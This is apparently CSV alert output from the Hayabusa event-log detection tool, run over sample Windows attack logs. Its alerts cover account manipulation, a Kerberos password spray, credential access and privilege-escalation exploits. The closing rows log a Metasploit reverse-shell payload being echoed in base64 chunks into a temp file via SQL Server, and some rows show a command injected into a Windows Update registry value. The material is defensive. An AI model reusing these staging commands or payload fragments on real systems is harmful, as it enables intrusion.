2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group03 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group04 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group04 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group05 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group05 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group06 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group06 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group07 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group07 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group08 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group08 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group09 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group09 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group10 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group10 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Non-Admin Global Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group11 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728-MemberAddedToGlobalGroup_NonAdmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1150 | Group: Group11 | LID: 0x8084443,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:27:05.579 +09:00,fs02.offsec.lan,4825,medium,LatMov,Denied Access To Remote Desktop,,../hayabusa-rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx
2020-07-12 14:28:26.831 +09:00,fs02.offsec.lan,4825,medium,LatMov,Denied Access To Remote Desktop,,../hayabusa-rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx
2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 0x80e25b9,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx
2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,Persis,User Added To Global Domain Admins Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1159 | Group: Domain Admins | LID: 0x80e25b9,../hayabusa-rules/hayabusa/default/alerts/Security/4728_MemberAddedToGlobalGroup_DomainAdmins.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx
2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: FAKE-COMPUTER$ | SID: S-1-5-21-4230534742-2542757381-3142984815-1168,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx
2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,../hayabusa-rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx
2020-07-13 17:34:33.915 +09:00,rootdc1.offsec.lan,4794,high,Persis,Password Change on Directory Service Restore Mode (DSRM) Account,,../hayabusa-rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx
2020-07-19 22:06:52.199 +09:00,01566s-win16-ir.threebeesco.com,5145,critical,LatMov,Protected Storage Service Access,,../hayabusa-rules/sigma/builtin/security/win_protected_storage_service_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_protectedstorage_5145_rpc_masterkey.evtx
2020-07-23 05:29:27.321 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: HD01 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: admin | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: svc-02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: HD02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: svc-01 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: bob | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: admin02 | Svc: krbtgt/THREEBEESCO.COM | IP Addr: 172.16.66.1 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.434 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: normal | Svc: krbtgt | IP Addr: 172.16.66.1 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.437 +09:00,01566s-win16-ir.threebeesco.com,4768,info,,Kerberos TGT Requested,User: normal | Svc: krbtgt | IP Addr: ::ffff:172.16.66.1 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ker�beros_pwd_spray_4771.evtx
2020-07-25 02:20:29.872 +09:00,LAPTOP-JU4M3I0E,10,high,,Process Access_Sysmon Alert,Credential Access - TeamViewer MemAccess | Src Process: C:\Users\bouss\AppData\Local\Temp\frida-b4f3ceb41e16327436594aec059ee5d5\frida-winjector-helper-32.exe | Tgt Process: C:\Program Files (x86)\TeamViewer\TeamViewer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x147a | Src PID: 18192 | Src PGUID: 00247C92-185D-5F1B-0000-0010667A1211 | Tgt PID: 2960 | Tgt PGUID: 00247C92-1562-5F1B-0000-0010318FFE10,../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_teamviewer-dumper_sysmon_10.evtx
2020-07-27 07:26:14.522 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7400 | Src PGUID: 747F3D96-FF9D-5F1D-0000-00100AC62400 | Tgt PID: 584 | Tgt PGUID: 
747F3D96-F938-5F1D-0000-00104B500000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx 2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3660 | PGUID: 747F3D96-0306-5F1E-0000-0010E15F3100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx 2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx 2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49796 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 7400 | PGUID: 747F3D96-FF9D-5F1D-0000-00100AC62400,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx 2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx 2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49796 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 
747F3D96-F935-5F1D-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx 2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\cmdLine: c:\windows\system32\cmd.exe | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx 2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\startArg: /c ""whoami > c:\x.txt & whoami /priv >>c:\x.txt"" | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx 2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\pauseArg: /c ""whoami > c:\x.txt & whoami /priv >>c:\x.txt"" | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx 2020-07-30 23:06:52.015 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - CVE-2020-1313 - New UScheduler rogue cmdline | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler\51999\queuedTime: QWORD (0x01d6667a-0xac806dc2) | Process: C:\windows\system32\svchost.exe | PID: 2596 | PGUID: 00247C92-19D5-5F14-0000-001019F52000,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_CVE-2020-1313_Sysmon_13_UScheduler_Cmdline.evtx
| User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:18.213 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo aKjBQRxTNujd/P//g84Q98ZfXltdw5CQkJCQkOWQkJBVi+yZRUBQ/xXkwUAAg8QEhbd0E4tNEIsdIFBRUuj0////g8QMXWOLRRAuTQxoVPlArzZR6Mf4//+DxAxdw5BRVYvsg+zOi5smVr51EInr+ItNF2oAiwZgAI1V/IlF9GoAUpHXBC5F9L8BUFKxRfwAAAAA/xWYwUAAHOD/tHdXiz3YwU4A/9dWwIQKiQZfXotXXcL+AP/Xxz4AAPoAXwWA/AoAXovlXcIoAIvk/JUGM8Aii+VdrQwAkJCQkJCLkJBVi+yD7BCLTQxWi9kQagCNVfixAEAvUotV7olF8I1F/IlN9FCLQgSNgfBqAVFQcUX81AAAz8dFJQC+AMYdFZTB8wDQ+JR1LFeLPd/BQL//14XAdQqJBl9ei4cI7QwA/ynHBgAgAABfBdfoCsdei+VdwgwAi0X8iQZe99gb0CVH7v7/BX4RAQCL5V1MWgCQkI9ViyRRiw8IjW4KUMR+ZgSAUQFF/B8AAEb/FbTBQHn0+P91HlaLNdjBQADX1oXAqgVei+Vdw/+889/8CgBeQOVUZzMb0OVdjZCQkJCOTJBVh1WL7FGLTQiN9ppQMH5mBDhRx0X8AQDvAP8VtMEqAIP4/28e54s12MFAAGaRhcB1c16L5V3D/9ZpgPwKAF7QK13DM8CLUCbDkJCQwJAGBZBdVaLsU4tdDFaLdQhXi30Oi8MLx3Upi06Di0YkC8gP3goBRwCLVgRS6NT///+DxASFzA9J9gAAAGLHrF3CDACFPA+MmwAAAH8ItJgPhqwAZgCwRiD+TiQLwXUUuE4EUej9/v//g8QEH8AG1ccAAACLViDO03X18EYkO9APhNqwAACLTRBqAGiLAwAAdVMwsBhPjCgAAItWBIsduMGcQEMEq2gGEIGCLP//0wAb5AsL04tG8WoEV18FEAAAaP//ABZQ/3OLfRCLXQyJlySJXiDFXjPAW13CiaiF/n9STwRu23MqYU4Ex0UI6QBwAFHob5//S4PEBIU9dT18Rh2LPdTBQADu1Qhq9QpoBhAAAGg4fgBDUP/XcFYEI00dagRRPXHK9gBo//9G5FL/14t9EAteIIl+ITMRX15bXcKUJ5CQkJBVi91Ri0UQM8lDwA+VwYlN/ItNDIP5QNVmXTVtAAAPhKgCYfBJg/kPzg4AAwAEcdIZkaKRQQD/JJX41kDWiy2tMgI/TvEP4QKA+XwPM8I7wnQvi04EjYn8apW7am3X//8ALlH/FezBQJCg+NAPikMCrgCLRRCFwCpGOIcODAKJKzgzwF7/5V3CDAAk/YlGM7XAXrHlo8IMW+4hCTPJi1Y4g3IEgPoED80BWK101IsZBDtV/L/ZUmoBaP//AABQ/xW4wUBNg/jCD4ToAZUXi0UQYsCLRjg2DgwEJJA4M8Bei0Jdwgw+JPv0RjgzwF6L5V3CDLSLrwgz0otOOIPhEJ95EA+U>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb64 | 
User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:18.488 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3b8 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:18.764 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9a0 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:19.038 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x132c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for 
reverse shell (MSF).evtx 2020-08-02 07:58:19.311 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1084 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:19.583 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 